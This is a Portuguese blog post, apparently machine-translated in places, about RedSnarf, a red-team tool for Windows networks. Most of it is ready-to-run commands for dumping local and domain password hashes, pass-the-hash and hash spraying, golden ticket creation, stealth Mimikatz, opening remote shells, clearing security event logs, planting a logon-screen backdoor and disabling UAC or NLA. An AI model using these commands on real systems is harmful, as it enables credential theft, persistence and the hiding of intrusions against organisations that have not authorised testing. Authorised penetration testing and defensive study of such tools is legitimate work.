ANDROID

[ANDROID][bsummary]

FACEBOOK

[FACEBOOK][twocolumns]

NOTÍCIAS

[NOTÍCIAS][bleft]

KALI LINUX

[KALI LINUX][grids]

RedSnarf - Uma ferramenta para Pentest / Red-Teaming para ambientes Windows

RedSnarf - Uma ferramenta de Pentest / Red-Teaming para ambientes Windows

RedSnarf é uma ferramenta de teste de caneta / red-teaming por Ed Williams para recuperar hashes e credenciais de estações de trabalho, servidores e controladores de domínio do Windows usando o OpSec Safe Techniques. 

A funcionalidade RedSnarf inclui:
  • Recuperação de hashes SAM locais
  • Enumeração de usuários / s executando com privilégios de sistema elevados e sua correspondente senha de segredos de lsa;
  • Recuperação de credenciais em cache do MS;
  • Pass-the-hash;
  • Identifique rapidamente combinações de nome de usuário / senha fraco e adivinhado (padrão do administrador / Senha 01);
  • A capacidade de recuperar hashes em um intervalo;
  • Pulverização de Hash -
  • Credsfile aceitará uma mistura de pwdump, fgdump e texto simples nome de usuário e senha separados por um espaço;
  • Lsass dump para análise offline com Mimikatz;
  • Dumping de hashes do controlador de domínio usando NTDSUtil e recuperação de NTDS.dit para análise local;
  • Dumping de hashes do controlador de domínio usando o método drsuapi;
  • Recuperação de Scripts e Políticas pasta de um controlador de domínio e análise para 'senha' e 'administrador';
  • Capacidade de descriptografar cashword hashes;
  • Capacidade de iniciar um shell em uma máquina remota;
  • A capacidade de limpar os logs de eventos (aplicativo, segurança, configuração ou sistema); (Apenas versão interna)
  • Os resultados são salvos por host para análise.
  • Ativar / Desativar o RDP em uma máquina remota.
  • Altere a porta RDP de 3389 para 443 em uma máquina remota.
  • Ativar / Desativar NLA em uma máquina remota.
  • Encontre onde os usuários estão logados em máquinas remotas.
  • Tela de logon do Backdoor Windows
  • Ativar / Desativar UAC em uma máquina remota.
  • Stealth mimikatz adicionado.
  • Parsing de hashes de domínio
  • Capacidade de determinar quais contas estão habilitadas / desabilitadas
  • Faça uma captura de tela de um Computador de Usuários Active
  • Registro Remote logado Desktop de usuários ativos
  • Decrypt Windows CPassword
  • Decrypt WinSCP Password
  • Obter usuários SPN's
  • Recuperar senhas WIFI de máquinas remotas


Requisitos de uso do RedSnarf :
Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git
CredDump7 - https://github.com/Neohapsis/creddump7
Lsass Recuperação usando procdump - https://technet.microsoft. com / en-us / sysinternals / dd996900.aspx
Netaddr (0.7.12) - pip install netaddr
Termcolor (1.1.0) - pip install termcolor
iconv - usado com a análise de informações Mimikatz localmente
Mostrar Ajuda
./redsnarf.py -h
./redsnarf.py --help

Recuperar hachas locais Recuperar hachas
locais de uma única máquina usando credenciais locais fracas e limpar o registro de eventos de segurança
./redsnarf.py -H ip=10.0.0.50 -uC security

Recupere hachuras locais de uma única máquina usando credenciais locais fracas e desmarcando o log de eventos do aplicativo
./redsnarf.py -H ip=10.0.0.50 -uC application

Recuperar hachas locais de uma única máquina usando credenciais de administrador local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .

Recuperar hachas locais de uma única máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com

Recuperar Hashes em um intervalo de rede usando credenciais de administrador local
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .

Recuperar Hashes em uma faixa de rede usando credenciais de administrador de domínio
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com

Recuperar Hashes em uma faixa de rede usando credenciais de administrador de domínio
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com


Hash Spraying
Spray Hashes em um intervalo de rede
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .

Recuperar Hashes em um logon de domínio de intervalo de rede
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com

Verifique rapidamente as credenciais
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y

Verifique rapidamente o arquivo contendo nomes de usuário (-hS) e uma senha genérica (-hP)
./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y


Recuperar Hashes de Domínio
Recuperar Hashes usando o método drsuapi (Mais Rápido)
Este método é compatível com um sinalizador opcional de -qy que irá consultar o LDAP e produzir se as contas estão ao vivo ou desativadas
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)

Recuperar Hashes usando NTDSUtil 
Este método oferece suporte a uma bandeira opcional de -qy que consultará o LDAP e emitirá se as contas estiverem ao vivo ou desativadas
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)

Golden Ticket Generation
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y


Coleta de informações
Copie a pasta Políticas e Scripts de um Controlador de Domínio e analise a senha e o administrador
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y

Decrypt Cpassword
./redsnarf.py -uG cpassword

Localizar usuário - ao vivo
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name

Localizar usuário - Offline (pesquisa informações pré baixadas)
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name

Listado de Tarefas do Display NT AUTHORITY \ SYSTEM
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y

Screenshot da área de trabalho de um usuário remoto conectado no Active
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y


Misc
Inicie um Shell em uma máquina usando credenciais de administrador local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y

Inicie um Shell em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y

Recuperar uma cópia do lsass para análise offline com Mimikatz em uma máquina usando credenciais de administrador local
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y

Execute stealth mimikatz, esta opção dispara um servidor da Web para servir um script de powershell , isso é obstruído e codificado lado da máquina, os dados não tocam o disco - os creds são codificados para um estilo fácil de ler e ecoados de volta à tela.
./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y

Executar Comando Personalizado 
Exemplo 1
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'

Exemplo 2 - Citações duplas precisam ser escapadas com \
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'

Política de Token de Acesso Local 
Cria um arquivo de lote lat.bat que você pode copiar e colar na máquina remota para executar o que irá modificar o registro e ativar ou desativar as configurações da Política de Token de Acesso Local.
./redsnarf.py -rL y

Wdigest 
Habilite o valor de registro UseLogonCredential Wdigest em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e

Desativar o valor de registro UseLogonCredential Wdigest em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d

Pergunta UseLogonCredential Wdigest valor de registro em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q

UAC 
Habilita o valor de registro UAC em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e

Desabilitar o valor do Registro UAC em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d

Consulta o valor do registro UAC em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q

Backdoor - Backdoor Windows Screen - Pressione Left Shift + Left Alt + Print Screen para ativar 
Habilitar o valor de registro Backdoor em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e

Desativar o valor do Registro Backdoor em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d

Valor de registro Backdoor da consulta em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q

AutoLogon 
Habilita o valor de registro do Windows AutoLogon em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e

Desabilitar o valor de registro do AutoLogon do Windows em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d

Consulta o valor de registro do Windows AutoLogon em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q

Bloqueie uma sessão de usuário de máquina remota usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y


RDP
Ativar RDP em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e

Desativar o RDP em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d

Verificar o status do RDP em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q

Alterar a porta RDP de 3389 a 443 - Alterar a porta RDP para 443 em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e

Alterar a porta RDP para o padrão de 3389 em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d

Query RDP Port Value em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q

Ativar Multi-RDP com Mimikatz
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y

Ativar RDP SingleSessionPerUser em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e

Desative o RDP SingleSessionPerUser em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d

Pergunta RDP SingleSessionPerUser status em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q


NLA
Habilitar NLA em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e

Desativar NLA em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d

Verificar o status NLA em uma máquina usando credenciais de administrador de domínio
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q



0 comentários via Blogger
comentários via Facebook

Nenhum comentário :